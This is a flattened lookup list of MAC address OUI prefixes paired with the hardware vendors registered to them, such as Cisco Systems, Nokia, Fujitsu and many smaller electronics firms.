Yoshiki Electronics Industry +D8BF4C Victory Concept Electronics Limited +C0DF77 Conrad Electronic SE +C86000 Asustek Computer +645299 The Chamberlain Group +BC125E Beijing WisVideo +C80718 TDSi +B4944E WeTelecom +345B11 EVI Heat AB +988BAD Corintech +4050E0 Milton Security Group +C87CBC Valink +409FC7 Baekchun I&C +C87D77 Shenzhen Kingtech Communication Equipment +A078BA Pantech +D4507A Ceiva Logic +9CC7D1 Sharp +00B9F6 Shenzhen Super Rich Electronics +9C5C8D Firemax Indstria E Comrcio DE Produtos Eletrnicos Ltda +E01E07 Anite Telecoms US. +B06CBF 3ality Digital Systems GmbH +20AA4B Cisco-Linksys +080D84 GECO +88E712 Whirlpool +644BF0 CalDigit +2838CF Gen2wave +50FC30 Treehouse Labs +70704C Purple Communications +F47ACC SolidFire +24BC82 Dali Wireless +64C5AA South African Broadcasting +64ED62 Woori Systems +C4237A WhizNets +8430E5 SkyHawke Technologies +2C002C Unowhy +0481AE Clack +C09132 Patriot Memory +A898C6 Shinbo +006BA0 Shenzhen Universal Intellisys PTE +502690 Fujitsu Limited +B4211D Beijing GuangXin Technology +E039D7 Plexxi +FC946C Ubivelox +38DE60 Mohlenhoff GmbH +2839E7 Preceno Technology Pte.Ltd. +28D997 Yuduan Mobile +886B76 China Hopeful Group Hopeful Electric +A0CF5B Cisco Systems +18C451 Tucson Embedded Systems +582EFE Lighting Science Group +F8D3A9 Axan Networks +5CD4AB Zektor +F8462D Syntec Incorporation +58677F Clare Controls +CCA374 Guangdong Guanglian Electronic TechnologyLtd +50F61A Kunshan Jade Technologies +20BBC6 Jabil Circuit Hungary +2C9717 I.c.y. +64E84F Serialway Communication Technology +941D1C TLab West Systems AB +40667A mediola - connected living AG +64808B VG Controls +7C6B52 Tigaro Wireless +046D42 Bryston +D0CF5E Energy Micro AS +644D70 dSPACE GmbH +807693 Newag SA +FC1794 InterCreative +181420 TEB SAS +D03110 Ingenic Semiconductor +AC81F3 Nokia +94C6EB Nova Electronics +10F9EE Nokia +80971B Altenergy Power System +1071F9 Cloud Telecomputers +C47B2F Beijing JoinHope Image Technology +18F650 Multimedia Pacific Limited +704AAE Xstream Flow (Pty) +9C934E Xerox +3C26D5 Sotera Wireless +FC2E2D Lorom IndustrialLTD. +E84E06 Edup International (hk) +E8C320 Austco Communication Systems +D8973B Artesyn Embedded Technologies +008D4E Cjsc NII STT +10C586 BIO Sound LAB +E8BA70 Cisco Systems +6473E2 Arbiter Systems +00A1DE ShenZhen ShiHua Technology +04E1C8 IMS Solues em Energia Ltda. +E4DD79 En-Vision America +60190C Rramac +34A709 Trevil srl +F80332 Khomp +C40F09 Hermes electronic GmbH +908D1D GH Technologies +CCB55A Fraunhofer Itwm +587521 Cjsc Rtsoft +64D989 Cisco Systems +44D3CA Cisco Systems +24DAB6 Sistemas de Gestin Energtica S.A. de C.V +B8F5E7 WayTools +148A70 ADS GmbH +FC0012 Toshiba Samsung Storage Technolgoy Korea +F44450 BND +644346 GuangDong Quick Network Computer +FCE892 Hangzhou Lancable Technology +B8B42E Gionee Communication Equipment,Ltd.ShenZhen +A84041 Dragino Technology, Limited +DCF05D Letta Teknoloji +D05A0F I-bt Digital +7CDD20 Ioxos Technologies +A0E9DB Ningbo FreeWings Technologies +9C7BD2 Neolab Convergence +900D66 Digimore Electronics +48C862 Simo Wireless +0CF3EE EM Microelectronic +F0C27C Mianyang Netop Telecom Equipment +BC35E5 Hydro Systems Company +283410 Enigma Diagnostics Limited +28CCFF Corporacion Empresarial Altra SL +14B73D Archean Technologies +A433D1 Fibrlink Communications +84DE3D Crystal Vision +B4AA4D Ensequence +040A83 Alcatel-Lucent +B42A39 Orbit Merret, spol. s r. o. +18AEBB Siemens Convergence Creators GmbH&Co.KG +3891FB Xenox Holding BV +50FAAB L-tek d.o.o. +A8E018 Nokia +44AAE8 Nanotec Electronic GmbH & KG +D8DF0D beroNet GmbH +D8C068 Netgenetech.co. +50E549 Giga-byte Technology +A8FCB7 Consolidated Resource Imaging +F87B8C Amped Wireless +44D2CA Anvia TV Oy +4C1A3A Prima Research And Production Enterprise +AC0613 Senselogix +CCF67A Ayecka Communication Systems +00BB8E HME +C0A26D Abbott Point of Care +205B2A Private +F8769B Neopis +08E672 Jebsee Electronics +58E476 Centron Communications Technologies Fujian +B435F7 Zhejiang Pearmain Electronicsltd. +0C6E4F PrimeVOLT +685B36 Powertech Industrial +983000 Beijing Kemacom Technologies +F81D93 Longdhua(Beijing) Controls Technology +D0EB9E Seowoo +8C5FDF Beijing Railway Signal Factory +586D8F Cisco-Linksys +14C21D Sabtech Industries +74B00C Network Video Technologies +C88439 Sunrise Technologies +44E4D9 Cisco Systems +0054AF Continental Automotive Systems +EC7D9D MEI +9C95F8 SmartDoor Systems +D075BE Reno A&E +7C6C39 Pixsys SRL +9C5D95 VTC Electronics +DC05ED Nabtesco +FC8329 Trei technics +94E848 Fylde Micro +AC5E8C Utillink +BC99BC FonSee Technology +986022 EMW +80B32A Alstom Grid +803457 OT Systems Limited +B83D4E Shenzhen Cultraview Digital Technology,Ltd Shanghai Branch +CCF3A5 Chi Mei Communication Systems +C4242E Galvanic Applied Sciences +6400F1 Cisco Systems +04C5A4 Cisco Systems +3CA72B MRV Communications (Networks) +584C19 Chongqing Guohong Technology Development Company Limited +D0A311 Neuberger Gebudeautomation GmbH +10A13B Fujikura Rubber +F4E142 Delta Elektronika BV +F00248 SmarteBuilding +2CDD0C Discovergy GmbH +40B2C8 Nortel Networks +486B91 Fleetwood Group +F43814 Shanghai Howell Electronic +20AA25 Ip-net +ECBBAE Digivoice Tecnologia em Eletronica Ltda +DC2008 ASD Electronics +088DC8 Ryowa Electronics +D491AF Electroacustica General Iberica +1CDF0F Cisco Systems +34DF2A Fujikon Industrial,Limited +C88447 Beautiful Enterprise +C88B47 Nolangroup S.P.A con Socio Unico +24BA30 Technical Consumer Products +74D675 Wyma Tecnologia +D01CBB Beijing Ctimes Digital Technology +9481A4 Azuray Technologies +BCE09D Eoslink +346F92 White Rodgers Division +8CDB25 ESG Solutions +641A22 Heliospectra AB +30142D Piciorgros GmbH +E441E6 Ottec Technology GmbH +10E2D5 Qi Hardware +7CDA84 Dongnian Networks +A036FA Ettus Research +EC836C RM Tech +6083B2 GkWare e.K. +80D019 Embed +D41296 Anobit Technologies +B8FF6F Shanghai Typrotech TechnologyLtd +DC9C52 Sapphire Technology Limited. +68122D Special Instrument Development +649B24 V Technology +0475F5 Csst +BC20BA Inspur (Shandong) Electronic Information +249442 Open Road Solutions +E0F379 Vaddio +B09AE2 Stemmer Imaging Gmbh +CCD811 Aiconn Technology +78D004 Neousys Technology +78A051 iiNet Labs +58A76F iD +44599F Criticare Systems +3C2F3A Sforzato +EC9233 Eddyfi NDT +ECE90B Sistema Solucoes Eletronicas Ltda - Easytech +A08C9B Xtreme Technologies +607688 Velodyne +980EE4 Private +E828D5 Cots Technology +08D5C0 Seers Technology +8CB64F Cisco Systems +6C33A9 Magicjack LP +08B7EC Wireless Seismic +BC71C1 XTrillion +0C469D MS Sedco +E0E8E8 Olive Telecommunication Pvt. +0C3C65 Dome Imaging +942053 Nokia +D49C8E University of Fukui +2CB0DF Soliton Technologies Pvt +5CF3FC IBM +D43D67 Carma Industries +00BD27 Exar +C8A729 SYStronics +6C9CE9 Nimble Storage +700258 01db-metravib +20FDF1 3com Europe +389592 Beijing Tendyron +705EAA Action Target +0C8D98 TOP Eight IND +30493B Nanjing Z-Com Wireless +68DB96 Opwill Technologies +00F860 PT. Panggung Electric Citrabuana +FCEDB9 Arrayent +44ED57 Longicorn +C8A1B6 Shenzhen Longway Technologies +641E81 Dowslake Microsystems +88ACC1 Generiton +785712 Mobile Integration Workgroup +380A0A Sky-City Communication and Electronics Limited Company +141BBD Volex +78C6BB Innovasic +DC4EDE Shinyei Technology +888B5D Storage Appliance +F0F842 Keebox +78A714 Amphenol +F450EB Telechips +988EDD TE Connectivity Limerick +98FC11 Cisco-Linksys +180C77 Westinghouse Electric Company +ACA016 Cisco Systems +E4AD7D SCL Elements +40D40E Biodata +7C051E Rafael +58570D Danfoss Solar Inverters +0C826A Wuhan Huagong Genuine Optics Technology +38C7BA CS Services +70D57E Scalar +7866AE Ztec Instruments +78818F Server Racks Australia +E0589E Laerdal Medical +44D63D Talari Networks +58FD20 Bravida Sakerhet AB +9835B8 Assembled Products +240B2A Viettel Group +68E41F Unglaube Identech GmbH +84F64C Cross Point BV +90513F Elettronica Santerno SpA +7CA29B D.SignT GmbH & KG +34AAEE Mikrovisatos Servisas UAB +A40CC3 Cisco Systems +34E0D7 Dongguan Qisheng Electronics Industrial +40520D Pico Technology +543131 Raster Vision +90E0F0 Ieee 1722a Working Group +1C6F65 Giga-byte Technology +F0AD4E Globalscale Technologies +903D5A Shenzhen Wision Technology Holding Limited +609AA4 GVI Security +F0ED1E Bilkon Bilgisayar Kontrollu Cih. Im.Ltd. +24A937 Pure Storage +348302 iFORCOM +949C55 Alta Data Technologies +389F83 OTN Systems N.V. +8C541D LGE +003A9D NEC Platforms +905446 TES Electronic Solutions +DC7B94 Cisco Systems +68234B Nihon Dengyo Kousaku +18422F Alcatel Lucent +A4BE61 EutroVision System +E06290 Jinan Jovision Science & Technology +A01859 Shenzhen Yidashi Electronics +042234 Wireless Standard Extensions +7812B8 Orantek Limited +F0B6EB Poslab Technology +FCCCE4 Ascon +34862A Heinz Lackmann GmbH & KG +842141 Shenzhen Ginwave Technologies +B4ED54 Wohler Technologies +544249 Sony +24DBAD ShopperTrak RCT +CC69B0 Global Traffic Technologies +2872C5 Smartmatic +B8A3E0 BenRui Technology +B8F732 Aryaka Networks +70828E OleumTech +502A7E Smart electronic GmbH +F0264C Dr. Sigrist AG +3C1CBE Jadak +A8995C aizo ag +F445ED Portable Innovation Technology +6C32DE Indieon Technologies Pvt. +FCCF62 IBM +B09074 Fulan Electronics Limited +2CA835 RIM +94F692 Geminico +8C736E Fujitsu Limited +30EFD1 Alstom Strongwish (Shenzhen) +C835B8 Ericsson, EAB/RWI/K +243C20 Dynamode Group +70D5E7 Wellcore +3CF72A Nokia +FCE192 Sichuan Jinwangtong Electronic Science&Technology +F8912A GLP German Light Products GmbH +E02630 Intrigue Technologies +8C9236 Aus.Linx Technology +4012E4 Compass-EOS +F8DC7A Variscite +003A9C Cisco Systems +E8E776 Shenzhen Kootion Technology +702F97 Aava Mobile Oy +9018AE Shanghai Meridian Technologies +0494A1 Catch THE Wind +2C3427 Erco & Gener +B42CBE Direct Payment Solutions Limited +F47626 Viltechmeda UAB +EC4476 Cisco Systems +9CEBE8 BizLink (Kunshan) +88ED1C Cudo Communication +B05B1F Thermo Fisher Scientific +743256 NT-ware Systemprg GmbH +003AAF BlueBit +C0BAE6 Application Solutions (Electronics and Vision) +20BFDB DVL +889821 Teraon +CC5076 Ocom Communications +7C2CF3 Secure Electrans +304174 Altec Lansing +7830E1 UltraClenz +FCFBFB Cisco Systems +1C129D Ieee PES Psrc/sub +B40832 TC Communications +002720 New-sol COM +002712 MaxVision +00270F Envisionnovation +0026D7 KM Electornic Technology +0026D1 S Squared Innovations +0026CB Cisco Systems +0026C4 Cadmos microsystems S.r.l. +0026BE Schoonderbeek Elektronica Systemen +0026B2 Setrix GmbH +0026AC Shanghai Luster Teraband Photonic +0026B1 Navis Auto Motive Systems +0026A7 Connect SRL +0026A1 Megger +0026A2 Instrumentation Technology Systems +00269B Sokrat +002695 ZT Group Int'l +00268F MTA SpA +6C8CDB Otus Technologies +401597 Protect America +60391F ABB +A07332 Cashmaster International Limited +7C7BE4 Z'sedai Kenkyusho +40EF4C Fihonest communication +24CF21 Shenzhen State Micro Technology +04B3B6 Seamap (UK) +10BAA5 Gana I&C +586ED6 Private +E09153 XAVi Technologies +CC0080 Bettini SRL +644BC3 Shanghai Woasis Telecommunications +0CE709 Fox Crypto +002703 Testech Electronics Pte +0026FD Interactive Intelligence +0026F6 Military Communication Institute +0026F0 cTrixs International GmbH. +0026EA Cheerchip Electronic Technology (ShangHai) +0026E3 DTI +0026DD Fival Science & Technology +0026DE FDI Matelec +54B620 Suhdol E&Cltd. +C4AAA1 Summit Development, Spol.s r.o. +78C40E H&D Wireless +9C5B96 NMR +E4FFDD Electron India +F852DF VNL Europe AB +1CF061 Scaps Gmbh +A893E6 Jiangxi Jinggangshan Cking Communication Technology +00267C Metz-Werke GmbH & KG +002676 Commidt AS +00266F Coordiwise Technology +002670 Cinch Connectors +002663 Shenzhen Huitaiwei Tech. +0025CD Skylane Optics +0025C8 S-Access GmbH +0025C7 altek +0025C1 Nawoo Korea +0025BA Alcatel-Lucent IPD +0025B5 Cisco Systems +0025AE Microsoft +0025A8 Kontron (BeiJing) Technology +0025A7 Comverge +00262B Wongs Electronics +002625 MediaSputnik +00261E Qingbang Elec(sz) +002619 FRC +002612 Space Exploration Technologies +00260B Cisco Systems +00260C Dataram +0025FF CreNova Multimedia +002606 Raumfeld Gmbh +0025F9 GMK electronic design GmbH +0025A2 Alta Definicion Linceo S.L. +002596 Gigavision srl +00259B Beijing Pkunity Microsystems Technology +002595 Northwest Signal Supply +00258F Trident Microsystems +002585 Kokuyo S&T +00257B STJ Electronics PVT +002574 Kunimi Media Device +00264F Krger &Gothe GmbH +002648 Emitech +002644 Thomson Telecom Belgium +00263E Trapeze Networks +002638 Xia Men Joyatech +00263D MIA +002631 Commtact +00256F Dantherm Power +002562 interbro +00255C NEC +00254F Elettrolab Srl +002518 Power Plus Communications AG +002513 CXP Digital BV +00250C Enertrac +002505 eks Engel GmbH & KG +0024F9 Cisco Systems +0024F2 Uniphone Telecommunication +0024ED YT Elec. +0024E6 In Motion Technology +0024E1 Convey Computer +0024DF Digitalbox Europe GmbH +0024DA Innovar Systems Limited +002549 Jeorich Tech. +002538 Samsung Electronics,, Memory Division +002542 Pittasoft +002530 Aetas Systems +002529 Comelit Group S.P.A +002522 ASRock Incorporation +00251D DSA Encore +0025F5 DVS Korea +0025F0 Suga Electronics Limited +0025EA Iphion BV +0025E4 Omni-wifi +0025E0 CeedTec Sdn Bhd +0025DA Secura Key +0025D9 DataFab Systems +002410 Nueteq Technology +002409 The Toro Company +0023FD AFT Atlas Fahrzeugtechnik GmbH +0023F6 Softwell Technology +0023EC Algorithmix GmbH +0023E7 Hinke A/S +002387 ThinkFlood +002381 Lengda Technology(Xiamen) +00237B Whdi +002372 More Star Industrial Group Limited +0024CE Exeltech +0024D3 Qualica +0024C7 Mobilarm +0024C2 Asumo +0024BC HuRob +0024B7 GridPoint +0024AB A7 Engineering +0024A6 Telestar Digital Gmbh +00249A Beijing Zhongchuang Telecommunication Test +00249F RIM Testing Services +002487 Blackboard +002498 Cisco Systems +002485 ConteXtream +002480 Meteocontrol GmbH +00244A Voyant International +002449 Shen Zhen Lite Star Electronics Technology +002443 Nortel Networks +002439 Digital Barriers Advanced Technologies +002479 Optec Displays +00246D Weinzierl Engineering GmbH +002474 Autronica Fire And Securirty +002468 Sumavision Technologies +002466 Unitron nv +002461 Shin Wang Tech. +00245C Design-Com Technologies +00244F Asantron Technologies +0023BB Schmitt Industries +0023BA Chroma +0023B5 Ortana +0023A8 Marshall Electronics +00239B Elster Solutions +002396 Andes Technology +002391 Maxian +00238C Private +002432 Neostar Technology +002429 MK Master +00241C FuGang Electronic (DG) +002428 EnergyICT +002416 Any Use +0023E0 INO Therapeutics +0023DA Industrial Computer Source (Deutschland)GmbH +0023C8 Team-r +0023C7 AVSystem +0023C1 Securitas Direct AB +0021DC Tecnoalarm S.r.l. +0021D6 LXI Consortium +0021CF The Crypto Group +0021C9 Wavecom Asia Pacific Limited +0021CA ART System +0021C3 Cornell Communications +002334 Cisco Systems +00232E Kedah Electronics Engineering +002329 DDRdrive +002322 Kiss Teknical Solutions +002325 Iolan Holding +002319 Sielox +002270 ABK North America +002317 Lasercraft +002310 LNC Technology +002273 Techway +002274 FamilyPhone AB +00226F 3onedata Technology +00226A Honeywell +002260 Afreey +00225B Teradici +002256 Cisco Systems +002255 Cisco Systems +00224D Mitac International +002252 Zoll Lifecor +002246 Evoc Intelligent Technology +002366 Beijing Siasun Electronic System +00236B Xembedded +002359 Benchmark Electronics ( Thailand ) Public Company Limited +00235F Silicon Micro Sensors GmbH +002353 F E T Elettronica snc +00234C KTC AB +002304 Cisco Systems +0022F3 Sharp +0022EE Algo Communication Products +0022E7 WPS Parking Systems +0022E1 Zort Labs +0022E2 Wabtec Transit Division +0022DB Translogic +0022A1 Huawei Symantec Technologies +00229B AverLogic Technologies +00229C Verismo Networks +002295 SGM Technology for lighting spa +00228E Tv-numeric +002289 Optosecurity +002282 8086 Consultancy +00227C Woori SMT +002279 Nippon Conlux +00223C Ratio Entwicklungen Gmbh +002236 Vector SP. Z O.O. +002230 FutureLogic +002229 Compumedics +00221D Freegene Technology +002224 Good Will Instrument +002223 TimeKeeping Systems +002216 Shibaura Vending Machine +002217 Neat Electronics +002211 Rohati Systems +00220A OnLive +002204 Koratek +0021FF Cyfrowy Polsat SA +0021F5 Western Engravers Supply +0021EF Kapsys +0021EE Full Spectrum +0022D4 ComWorth +0022CA Anviz Biometric Tech. +0022C5 Inforson +0022C0 Shenzhen Forcelink Electronic +0022BB beyerdynamic GmbH & KG +0022AE Mattel +0022AD Telesis Technologies +0022A8 Ouman Oy +002132 Masterclock +00212C SemIndia System Private Limited +002131 Blynke +00211F Shinsung Deltatech +002120 Sequel Technologies +002125 KUK JE Tong Shin +002112 Wiscom System +001FB9 Paltronics +001FB7 WiMate Technologies +001FB8 Universal Remote Control +001FB2 Sontheim Industrie Elektronik GmbH +001FAB I.S High Tech.inc +001FA6 Stilo srl +001FA1 Gtran +001F9C Ledco +00215E IBM +002151 Millinet +002152 General Satellite Research & Development Limited +002157 National Datacast +00214B Shenzhen Hamp Science & Technology +002145 Semptian Technologies +002144 SS Telecoms +00213C AliphCom +00213B Berkshire Products +002190 Goliath Solutions +002189 AppTech +002184 Powersoft SRL +00217D Pyxis S.r.l. +002177 W. L. Gore & Associates +002176 YMax Telecom +002171 Wesung TNC +002164 Special Design Bureau for Seismic Instrumentation +002103 GHI Electronics +001FFA Coretree +001FF5 Kongsberg Defence & Aerospace +001FF4 Power Monitors +001FEE ubisys technologies GmbH +001FE7 Simet +001FDB Network Supply +001FD1 Optex +001FCA Cisco Systems +001FBE Shenzhen Mopnet Industrial +001F62 JSC Stilsoft +001F67 Hitachi +001F55 Honeywell Security (China) +001F56 Digital Forecast +001F4F Thinkware +001F48 Mojix +001F43 Entes Elektronik +001F8E Metris USA +001F88 FMS Force Measuring Systems AG +001F81 Accel Semiconductor +001B58 ACE CAD Enterprise +001F78 Blue Fox Porini Textile +001F6E Vtech Engineering +001F68 Martinsson Elektronik AB +0021BC Zala Computer +0021B7 Lexmark International +0021B0 Tyco Telecommunications +0021A4 Dbii Networks +00219A Cambridge Visual Networks +002196 Telsey +001E4B City Theatrical +001E47 PT. Hariff Daya Tunggal Engineering +001E41 Microwave Communication & Component +001E2E Sirti +001E27 SBN Tech +001E28 Lumexis +001DF2 Netflix +001DEB Dinec International +001DEC Marusys +001DE6 Cisco Systems +001DDA Mikroelektronika spol. s r. o. +001DDF Sunitec Enterprise +001DC7 L-3 Communications Geneva Aerospace +001DC0 Enphase Energy +001ED8 Digital United +001ED2 Ray Shine Video Technology +001ED1 Keyprocessor +001ECC Cdvi +001EC5 Middle Atlantic Products +001EBF Haas Automation +001EB9 Sing Fai Technology Limited +001EB2 LG innotek +001F2E Triangle Research Int'l Pte +001F2D Electro-Optical Imaging +001F27 Cisco Systems +001F14 NexG +001F1B RoyalTek Company +001F0D L3 Communications - Telemetry West +001F0E Japan Kyastem +001E22 Arvoo Imaging Products BV +001E1B Digital Stream Technology +001E16 Keytronix +001E15 Beech Hill Electronics +001E11 Elelux International +001E05 Xseed Technologies & Computing +001E0C Sherwood Information Partners +001DFE Palm +001DF9 Cybiotronics (Far East) Limited +001EAD Wingtech Group Limited +001EA2 Symx Systems +001EA7 Actiontec Electronics +001EA1 Brunata a/s +001E9B San-Eisha +001E94 Supercom Technology +001E8F Canon +001E87 Realease Limited +001E80 Last Mile +001EFC JSC Massa-k +001F08 Risco +001EF5 Hitek Automated +001EFB Trio Motion Technology +001EE9 Stoneridge Electronics AB +001EEE ETL Systems +001E7B R.I.CO. S.r.l. +001E76 Thermo Fisher Scientific +001E6A Beijing Bluexon Technology +001E71 MIrcom Group of Companies +001E63 Vibro-Meter SA +001E5E COmputime +001E57 Alcoma, spol. s r.o. +001E51 Converter Industry Srl +001DB9 Wellspring Wireless +001DB4 Kumho ENG +001D9E Axion Technologies +001DA3 SabiOso +001D9D Artjoy International Limited +001D45 Cisco Systems +001D3E Saka Techno Science +001D37 Thales-Panda Transportation System +001D38 Seagate Technology +001D32 Longkay Communication & Technology (Shanghai) +001D2B Wuhan Pont Technology +001D1F Siauliu Tauro Televizoriai +001D26 Rockridgesound Technology +001D1A OvisLink +001D7A Wideband Semiconductor +001D74 Tianjin China-Silicon Microelectronics +001D62 InPhase Technologies +001D61 BIJ +001D5B Tecvan Informtica Ltda +001D54 Sunnic Technology & Merchandise +001D4A Carestream Health +001CE8 Cummins +001CE4 EleSy JSC +001CDD Cowbell Engineering +001CDE Interactive Multimedia eXchange +001CD8 BlueAnt Wireless +001CD1 Waves Audio +001CCB Forth Public Company Limited +001CC5 3Com +001D14 Speradtone Information Technology Limited +001D07 Shenzhen Sang Fei Consumer Communications +001D01 Neptune Digital +001CEE Sharp +001CF5 Wiseblue Technology Limited +001CB9 Kwang Sung Electronics +001CAF Plato Networks +001CB4 Iridium Satellite +001C9F Razorstream +001C99 Shunra Software +001C8C Dial Technology +001C93 ExaDigm +001C87 Uriver +001C82 Genew Technologies +001C1A Thomas Instrumentation +001C0E Cisco Systems +001C13 Optsys Technology +001C07 Cwlinux Limited +001C00 Entry Point +001BF4 Kenwin Industrial(hk) +001BEF Blossoms Digital Technology +001BE2 AhnLab +001C7D Excelpoint Manufacturing Pte +001C78 Wyplay SAS +001C65 JoeScan +001C67 Pumpkin Networks +001C66 Ucamp +001C60 CSP Frontier Technologies +001C54 Hillstone Networks +001C59 Devon IT +001C4F Macab AB +001C37 Callpod +001C3C Seon Design +001C30 Mode Lighting (UK ) +001C2B Alertme.com Limited +001C2A Envisacor Technologies +001C29 Core Digital Electronics +001C24 Formosa Wireless Systems +001C1F Quest Retail Technology +001D97 Alertus Technologies +001D90 Emco Flow Systems +001D84 Gateway +001D67 Amec +001A93 Erco Leuchten Gmbh +001A98 Asotel Communication Limited Taiwan Branch +001A8E 3Way Networks +001A7D cyber-blue(HK)Ltd +001A82 Proba Building Automation +001A7C Hirschmann Multimedia +001A78 ubtos +001A7B Teleco +001A71 Diostech +001A6C Cisco Systems +001A65 Seluxit +001B7D CXR Anderson Jacobson +001B71 Telular +001B6A Powerwave Technologies Sweden AB +001B65 China Gridcom +001B5E BPL Limited +001B57 Semindia Systems Private Limited +001B46 Blueone Technology +001B4B Sanion +001BAD iControl Incorporated +001BA6 intotech +001BA1 mic AB +001B93 JC Decaux SA DNT +001B95 Video Systems SRL +001B9A Apollo Fire Detectors +001B94 T.E.M.A. +001B8E Hulu Sweden AB +001B89 Emza Visual Sense +001B8A 2M Electronic A/S +001B84 Scan Engineering Telecom +001BD1 Sogestmatic +001BD6 Kelvin Hughes +001BCF Dataupia +001BD0 Identec Solutions +001BCA Beijing Run Technology Company +001BC3 Mobisolution +001BBE Icop Digital +001BB4 Airvod Limited +001B14 Carex Lighting Equipment Factory +001B0D Cisco Systems +001B06 Ateliers R. Laumonier +001B08 Danfoss Drives A/S +001B01 Applied Radio Technologies +001AF5 Pentaone. +001AFA Welch Allyn +001AE4 Medicis Technologies +001ADD PePWave +001AD1 Fargo +001AD8 AlsterAero GmbH +001ACA Tilera +001ACC Celestial Semiconductor +001AC5 BreakingPoint Systems +001ABB Fontal Technology Incorporation +001AC0 Joybien Technologies +001A60 Wave Electronics +001A55 ACA-Digital +001A5A Korea Electric Power Data Network (KDN) +001A4E NTI AG / LinMot +001A53 Zylaya +001A42 Techcity Technology +001A47 Agami Systems +001A3B Doah Elecom +001B3F ProCurve Networking by HP +001B3A Sims +001B2C Atron Electronic Gmbh +001B27 Merlin CSI +001B20 TPine Technology +001B19 Ieee I&M Society TC9 +001AB4 Ffei +001AAF Blusens Technology +001AA8 Mamiya Digital Imaging +001A9F A-Link +001AA6 Telefunken Radio Communication Systems GmbH &CO.KG +00193F RDI technology(Shenzhen) +001933 Strix Systems +001938 UMB Communications +00192D Nokia +001926 BitsGen +001928 Siemens AG, Transportation Systems +00190E Atech Technology +001913 Chuang-Yi Network EquipmentLtd. +001915 Tecom +00191A Irlink +001993 Changshu Switchgear MFG.,Ltd. (Former Changshu Switchgea +001998 Sato +00198E Oticon A/S +001980 Gridpoint Systems +00197B Picotest +001968 Digital Video Networks(Shanghai) +00196D Raybit Systems Korea +00196F SensoPart GmbH +001952 Acogito +001957 Saafnet Canada +001946 Cianet Industria e Comercio S/A +001944 Fossil Partners +001A2F Cisco Systems +001A36 Aipermon GmbH & KG +001A25 Delta Dore +001A17 Teak Technologies +001A19 Computer Engineering Limited +001A12 Essilor +001A0B Bona Technology +001A06 OpVista +0018CD Erae Electronics Industry +0018D2 High-Gain Antennas +0018D9 Santosha Internatonal +0018C1 Almitec Informtica e Comrcio +0018C8 Isonas +0018BC ZAO NVP Bolid +0018B5 Magna Carta +0018AE TVT +001902 Cambridge Consultants +001907 Cisco Systems +0018FD Optimal Technologies International +0018F1 Chunichi Denshi +0018EA Alltec GmbH +0018EC Welding Technology +0018E5 Adhoco AG +0018A2 XIP Technology AB +0018A9 Ethernet Direct +00189D Navcast +001893 Shenzhen Photon Broadband Technology +001898 Kingstate Electronics +001891 Zhongshan General K-mate Electronics +00188C Mobile Action Technology +0019C8 AnyDATA +0019C3 Qualitrol +0019BE Altai Technologies Limited +0019BC Electro Chance SRL +0019A4 Austar Technology (hang zhou) +0019A9 Cisco Systems +0019AB Raycom +0019B0 HanYang System +0019FA Cable Vision Electronics +0019FF Finnzymes +0019EC Sagamore Systems +0019F3 Cetis +0019F8 Embedded Systems Design +0019E5 Lynx Studio Technology +0019E7 Cisco Systems +0019CD Chengdu ethercom information technology +0019D4 ICX Technologies +0019D9 Zeutschel GmbH +001823 Delta Electronics +001817 D. E. Shaw Research +00181E GDX Technologies +001812 Beijing Xinwei Telecom Technology +001806 Hokkei Industries +00180B Brilliant Telecommunications +001805 Beijing InHand Networking Technology +0017B8 Novatron +0017BD Tibetsystem +0017B1 Acist Medical Systems +0017AA elab-experience +0017AC O'Neil Product Development +0017A5 Ralink Technology +0017A0 RoboTech srl +00170F Cisco Systems +001705 Methode Electronics +00170A Inew Digital Company +0016F9 Cetrta POT, D.o.o. +0016F7 L-3 Communications, Aviation Recorders +0016E6 Giga-byte Technology +00178F Ningbo Yidong Electronic +001794 Cisco Systems +00178D Checkpoint Systems +00177C Smartlink Network Systems Limited +001781 Greystone Data System +001788 Philips Lighting BV +00176C Pivot3 +001770 Arti Industrial Electronics +001775 TTE Germany GmbH +001760 Naito Densei Machida MFG.CO. +001767 Earforce AS +00185A uControl +00185F TAC +001861 Ooma +001866 Leutron Vision +001853 Atera Networks +00184E Lianhe Technologies +001847 AceNet Technology +00183B Cenits +001840 3 Phoenix +001842 Nokia Danmark A/S +001825 Private +00182A Taiwan Video & Monitor +001836 Reliance Electric Limited +001759 Cisco Systems +001754 Arkino HiTOP Limited +001746 Freedom9 +001748 Neokoros Brasil Ltda +00174D Dynamic Network Factory +001741 Defidev +001733 SFR +00172E FXC +001727 Thermo Ramsey Italia s.r.l. +001722 Hanazeder Electronic GmbH +00171B Innovation Lab +001714 BR Controls Nederland bv +001716 Qno Technology +0017F4 Zeron Alliance +0017F9 Forcom Sp. z o.o. +001800 Unigrand +0017ED WooJooIT +0017DA Spans Logic +0017E1 Dacos Technologies +0017D0 Opticom Communications +0017C4 Quanta Microsystems +001880 Maxim Integrated Products +00186D Zhenjiang Sapphire Electronic Industry +001872 Expertise Engineering +001874 Cisco Systems +001879 dSys +001686 Karl Storz Imaging +00167F Bluebird Soft +001681 Vector Informatik GmbH +001674 EuroCB (Phils.) +001672 Zenway enterprise +001666 Quantier Communication +00165F Fairmount Automation +0016AA Kei Communication Technology +0016AF Shenzhen Union Networks Equipment +0016A5 Tandberg Storage ASA +001699 Tonic DVB Marketing +0016A0 Auto-Maskin +001692 Scientific-Atlanta +001694 Sennheiser Communications A/S +00168D Korwin +00165A Harman Specialty Group +001653 Lego System A/S IE Electronics Division +00164C Planet INT +001647 Cisco Systems +001642 Pangolin +00163D Tsinghua Tongfang Legend Silicon Tech. +001631 Xteam +00162F Geutebrck GmbH +001630 Vativ Technologies +0015F5 Sustainable Energy Systems +0015F4 Eventide +0015EE Omnex Control Systems +0015F3 Peltor AB +0015E7 Quantec Tontechnik +0015E2 Dr.Ing. Herbert Knauer GmbH +0015DD IP Control Systems +0015D8 Interlink Electronics +0015CA TeraRecon +001598 Kolektor group +001593 U4EA Technologies +00158C Liab ApS +001586 Xiamen Overseas Chinese Electronic +001585 Aonvision Technolopy +001587 Takenaka Seisakusho +001580 U-way +00157B Leuze electronic GmbH + KG +001576 LABiTec - Labor Biomedical Technologies GmbH +00156A DG2L Technologies Pvt. +00156F Xiranet Communications GmbH +0016DF Lundinova AB +0016DA Futronic Technology +0016D5 Synccom +0016C9 NAT Seattle +0016D0 ATech elektronika d.o.o. +0016BD ATI Industrial Automation +0016C2 Avtec Systems +0016BB Law-Chain Computer Technology +00162A Antik computers & communications s.r.o. +001623 Interval Media +001617 MSI +00161E Woojinnet +00160D Be Here +001606 Ideal Industries +0015FA Cisco Systems +001563 Cisco Systems 